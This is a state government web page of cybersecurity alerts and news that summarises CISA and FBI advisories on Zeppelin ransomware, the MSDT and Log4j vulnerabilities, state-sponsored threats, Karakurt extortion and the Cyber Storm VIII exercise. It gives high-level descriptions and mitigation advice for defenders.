State Government Cyber Updates

ACTIVE THREATS

Zeppelin Ransomware - Alert AA22-223A (updated 08/11/2022)

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Zeppelin ransomware IOCs and TTPs associated with ransomware variants identified through FBI investigations as recently as 21 June 2022. The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report: pdf, 999 kbDownload the YARA signature for Zeppelin: YARA Signature, .yar 125 kbDownload the IOCs: .stix 113 kb

----------------------------------------------------------------------------

CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability (updated 06/02/2022)  

On Monday May 30, 2022, Microsoft issued CVE-2022-30190 regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability. A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.

The MSRC Team will continue to update CVE-2022-30190, please visit their CVE-2022-30190 page for further information.

----------------------------------------------------------------------------

Apache Log4j Vulnerability and the Log4shell exploit(s), Winter 2022 (updated 01/25/2022)

Log4j is a ubiquitous piece of software used to record activities in a wide range of systems found in consumer-facing products and services. Recently, a serious vulnerability in the popular Java logging package, Log4j (CVE-2021-44228) was disclosed, posing a severe risk to millions of consumer products to enterprise software and web applications. The vulnerability (CVE-2021-44228) in the Apache Log4j logging library allows for remote code execution (RCE), ransomware, crypto miners, and data exfiltration. The Log4shell attacks can be delivered through a variety of protocols including IMAP, DNS, SMTP, HTTP, and LDAP. This vulnerability is being widely exploited by a growing set of attackers, and we urge you to take action.

For more information, please view the Strategic Technology Solutions Apache Log4j Vulnerability Exploit Quick Guide (PDF download), or CISA's Log4j Vulnerability Guidance site.  For further questions, you can reach out to the CISO’s office through the CyberSafeTN contact form.

NEWS & UPDATES

CISA Updates Infrastructure Resilience Planning Framework (11/29/22) - The framework gives advice and resources for improving the security and resilience of critical infrastructure. Updates include guidance on bringing diverse opinions into planning efforts plus drought-related risks. 

CISA Releases New Red Team Tool – RedEye (10/14/2022) - CISA released RedEye, an interactive open-source analytic tool for use by Red Teams to visualize and report command and control activities. This tool was developed in partnership with the Department of Energy Pacific Northwest National Lab. It allows a Red Team operator to quickly assess complex data associated with an engagement or penetration test (pen test), evaluate mitigation strategies, and enable effective decision making to strengthen an organizations cybersecurity posture. 

RedEye will intake Cobalt Strike logs from a pen test or Red Team engagement that uses Cobalt Strike. With this information, the tool will arrange logs to be easily queried and display them in a graphical, timeline format. RedEye also parses logs and presents the data to each operator. Operators can then tag and add comments to the activities in the tool, which can then be used in a presentation mode to present findings and workflow to stakeholders. 

Using this tool, Red Teams can quickly organize information and communicate findings, key events, and penetration paths, which without this tool would be a manual process scrolling through thousands of lines of text. For more information, CISA encourages users to review RedEye on GitHub and watch CISA’s RedEye tool overview video.

CISA, NSA and FBI Release Advisory on PRC State-Sponsored Malicious Cyber Activity  (10/06/2022) - The Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory (CSA) with details about the top vulnerabilities used and exploited since 2020 by the People’s Republic of China (PRC) state-sponsored cyber actors to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.

The PRC state-sponsored actors continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access. The majority of the common vulnerabilities and exposures (CVEs) are vulnerable to remote code execution, meaning an adversary could exploit those specific vulnerabilities to gain unauthorized access and take control of an affected system. Many of the known vulnerabilities in this CSA allow the actors to operate in a stealthy manner to gain unauthorized access into sensitive networks. Once they gain unauthorized access inside a network, these actors seek to establish persistence and move laterally to other internally connected networks. 

The CSA provides an appendix with a clear, concise description and vulnerable technologies and versions for each CVE; it also provides recommended mitigations and detection methods, if any exist. Some of the actions in this CSA that can help protect networks include: 

  • Update and patch systems, including those in this CSA and CISA’s known exploited vulnerabilities catalog.  
  • Use phishing-resistant multi-factor authentication whenever possible.  
  • Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. 
  • Block obsolete or unused protocols at the network edge. 
  • Upgrade or replace end-of-life devices. 
  • Move toward the Zero Trust security model.
  • Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.

Joint Cybersecurity Advisory from CISA and FBI regarding Zeppelin Ransomware (8/11/2022) - The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) recently released a joint Cybersecurity Advisory (CSA) with technical details on Zeppelin ransomware along with recommend actions, mitigations, and resources for organizations to use to protect and respond to this cyber threat. 

Observed as recently as April 2022, malicious actors using Zeppelin exploit vulnerabilities in remote desktop protocol and SonicWall firewall, and phishing campaigns to gain initial access to victims’ network. The advisory contains several indicators of compromise (file hashes) that network defenders can use to detect if this threat is on their networks.

A Message from CISA Regarding Karakurt Data Extortion Group (6/1/2022)

In partnership with the FBI, Treasury, and FinCEN, CISA published a joint Cybersecurity Advisory (CSA) with recommended actions and mitigations for organizations to take to protect against reported tactics, techniques, and procedures (TTPs) by Karakurt data extortion group that has been creating significant challenges for defense and mitigation.  

Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. As of May 2022, several terabytes worth of data purported to belong to victims across North America and Europe, along with several “press releases” naming victims who had not paid or cooperated, and instructions for participating in victim data “auctions” was reported to be contained on Karakurt operated website located in the deep web and on the dark web.  

During reconnaissance, Karakurt actors appear to obtain access to victim devices, primarily, by purchasing stolen login credentials. They can also obtain access to already compromised victims from cooperating partners in the cybercrime community or buying access to already compromised victims via third-party intrusion broker networks.  

Actions that organizational leaders and network administrators can take today to mitigate cyber threats from ransomware include prioritizing patching known exploited vulnerabilities, training users to recognize and report phishing attempts, and enforcing multi-factor authentication (MFA). More recommended mitigations include: 

·        Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location. 

·        Implement network segmentation and maintain offline backups of data to ensure limited interruption to the organization. 

·        Regularly back up data and password protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides. 

·        Install and regularly update antivirus software on all hosts and enable real time detection. 

·        Review domain controllers, servers, workstations, and active directories for new or unrecognized accounts.    

Organizations are encouraged to review the advisory for all the details on the Karakurt actors, associated indicators of compromise, malicious behavior mapped to MITRE ATT&CK, and agency resources available to all organizations.  

All organizations should share information about incidents and unusual cyber activity with CISA and/or FBI. When cyber incidents are reported quickly, it can contribute to stopping further attacks. Organizations should inform CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870, or an FBI field office.

Your support to amplify this advisory through your communications and social media channels is appreciated. And as always, thank you for your continued collaboration. 

 

Alert (AA22-011A) Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure:

updated 01/25/2022 - Alert AA22-011A (CISA website)

This joint Cybersecurity Advisory (CSA)—authored by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA)—is part of our continuing cybersecurity mission to warn organizations of cyber threats and help the cybersecurity community reduce the risk presented by these threats. This CSA provides an overview of Russian statesponsored cyber operations; commonly observed tactics, techniques, and procedures (TTPs); detection actions; incident response guidance; and mitigations. This overview is intended to help the cybersecurity community reduce the risk presented by these threats. CISA, the FBI, and NSA encourage the cybersecurity community—especially critical infrastructure network defenders—to adopt a heightened state of awareness and to conduct proactive threat hunting, as outlined in the Detection section. Additionally, CISA, the FBI, and NSA strongly urge network defenders to implement the recommendations listed below and detailed in the Mitigations section. These mitigations will help organizations improve their functional resilience by reducing the risk of compromise or severe business degradation. For more info, please visit https://www.cisa.gov/uscert/ncas/alerts/aa22-011a.

 

Cyber Storm VIII Exercise, Spring 2022:

updated 08/06/2021 - CS VIII States Brief

  • As part of CISA’s efforts to strengthen cybersecurity preparedness and partnerships, we would like to provide some information regarding the upcoming Cyber Storm VIII exercise in Spring 2022.
  • Cyber Storm is CISA’s biennial cyber capstone exercise that provides a venue for participants to simulate the discovery of and response to a widespread coordinated cyberattack without the consequences of a real-world event. Cyber Storm brings together hundreds of agencies and organizations from across the public and private sectors to simulate response and coordination efforts to a significant cyber incident impacting the nation’s critical infrastructure with the aim of strengthening cybersecurity preparedness and response capabilities by exercising policies, processes, and procedures.
  • Cyber Storm is a distributed exercise, meaning organizations participate from their actual work locations. Interested states can participate either as a Victim organization or elect to participate in tandem with MS-ISAC as a Monitor and Respond organization. Victim organizations are directly affected by the incident, whereas Monitor and Respond organizations utilize normal communication channels, such as the MS-ISAC and government bulletins, to monitor events during the exercise and respond appropriately. 
  • States interested in participating as Victim organizations will actively work with the Cyber Storm Planning Team over the course of the fall and winter to plan the extent of their organization’s participation in the exercise and develop customized scenario injects to meet their organization’s unique goals and level of play.
  • The next planning meeting is the Midterm Planning Meeting, scheduled to be held in-person and virtually in McLean, VA, on September 16, 2021.
  • The Cyber Storm Planning Team looks forward to working with members of your organization as we work together to increase cybersecurity preparedness and strengthen partnerships. For your convenience, we attached a quick overview of Cyber Storm VIII. Please contact Marshall Garnuette (Garnuette_Marshall@bah.com), Cyber Storm States Working Group Lead to learn more about participating in Cyber Storm VIII.